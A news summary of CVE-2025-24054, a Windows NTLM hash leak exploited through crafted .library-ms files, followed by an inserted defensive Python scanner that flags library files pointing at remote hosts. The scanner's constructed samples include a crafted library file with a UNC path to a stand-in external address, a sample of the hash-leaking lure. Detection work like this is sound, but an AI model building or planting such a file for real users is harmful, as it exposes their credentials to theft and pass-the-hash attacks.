The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a medium-severity Windows vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, identified as CVE-2025-24054, allows attackers to steal NTLM hashes — a legacy Windows authentication method — through malicious files, enabling lateral movement attacks across networks.

The vulnerability, patched by Microsoft in March 2025, has been actively exploited in campaigns targeting government and private institutions in Poland and Romania. In these cases, attackers distributed Dropbox links containing ZIP archives with exploit files that leaked NTLMv2-SSP hashes with minimal user interaction — just downloading and extracting the content was enough. Similar attacks previously hit Ukraine and Colombia in 2024, linked to groups such as UAC-0194 and Blind Eagle.

Microsoft noted that the risk arises even with minimal user action, such as previewing a crafted .library-ms file. While the company initially considered exploitation "unlikely," the flaw has since been used in at least 10 recent campaigns. The issue is a variant of CVE-2024-43451, also related to NTLM hash leaks, further underscoring the need for immediate patching.
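A check an incident responder or mail-gateway engineer would want after reading the above is a way to triage extracted archives for `.library-ms` files that point Explorer at a host outside the machine. The following scanner is an added example, not code from the article or from Microsoft. It assumes that a crafted library file carries its remote location in the `<url>` element of the Windows library XML schema (namespace `http://schemas.microsoft.com/windows/2009/library`) and that any UNC, `smb://`, `file://` or WebDAV location naming a non-local host is worth flagging; the sample documents and the `203.0.113.10` address are constructed for the demonstration.

```python
"""Triage Windows .library-ms files for locations that name a remote host.

Added example, not from the original article. Assumption: a crafted
.library-ms file contains a library location (<url> element) that resolves
to a host the attacker controls, so Explorer authenticates there when the
file is previewed. This scanner only reads files; it never opens the paths.
"""
import os
import re
import sys
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace used by Windows library description (.library-ms) documents.
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}
REMOTE_SCHEMES = {"smb", "file", "http", "https", "webdav"}
UNC_RE = re.compile(r"\\\\[^\s<>\"']+")  # fallback search for malformed XML


def is_remote_location(location: str) -> bool:
    """True if a library location would make Explorer contact another host."""
    loc = location.strip()
    if loc.startswith("\\\\") or loc.startswith("//"):
        # UNC path: the first path component is the host name or address.
        host = re.split(r"[\\/]+", loc.lstrip("\\/"), maxsplit=1)[0]
        return host.lower() not in LOCAL_HOSTS
    parsed = urlparse(loc)
    if parsed.scheme.lower() in REMOTE_SCHEMES:
        return (parsed.hostname or "").lower() not in LOCAL_HOSTS
    # knownfolder:{GUID}, shell: references and drive-letter paths are local.
    return False


def scan_library_ms(xml_text: str) -> list[str]:
    """Return every remote location referenced by a .library-ms document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # A deliberately malformed file may still be accepted by Explorer;
        # fall back to a plain UNC-path search instead of ignoring it.
        candidates = UNC_RE.findall(xml_text)
    else:
        candidates = [el.text for el in root.iter(LIBRARY_NS + "url") if el.text]
        # Also accept unqualified <url> elements in case the namespace was dropped.
        candidates += [el.text for el in root.iter("url") if el.text]
    return [c.strip() for c in candidates if is_remote_location(c)]


def scan_directory(root_dir: str) -> dict[str, list[str]]:
    """Walk root_dir (e.g. an extracted archive) and map suspicious files to hits."""
    findings: dict[str, list[str]] = {}
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".library-ms"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8-sig", errors="replace") as fh:
                remote = scan_library_ms(fh.read())
            if remote:
                findings[path] = remote
    return findings


# Constructed sample: a normal Documents-style library with only local locations.
BENIGN_LIBRARY = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed sample: same structure, but one location names an external host
# (203.0.113.10 is a documentation address, not a real server).
SUSPICIOUS_LIBRARY = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Invoices</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\203.0.113.10\\share\\docs</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_directory(sys.argv[1]).items():
            print(f"{path}: remote location(s) {hits}")
    else:
        print("benign:", scan_library_ms(BENIGN_LIBRARY))
        print("suspicious:", scan_library_ms(SUSPICIOUS_LIBRARY))
```

Run it with the directory of an extracted ZIP as the argument to list every library file that references a non-local host; with no argument it scans the two constructed samples. The fallback regex matters because a file that Explorer's parser tolerates may still be rejected by a strict XML parser, and a scanner that silently skips such files would miss exactly the crafted ones.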

CISA required U.S. federal agencies to apply the patches by May 8, 2025. Experts warn that NTLM hashes can be used in "pass-the-hash" attacks for privilege escalation, making proactive vulnerability management critical in corporate environments.

This post was translated and summarized from its original version using ChatGPT version 4o, with human review.

Source: The Hacker News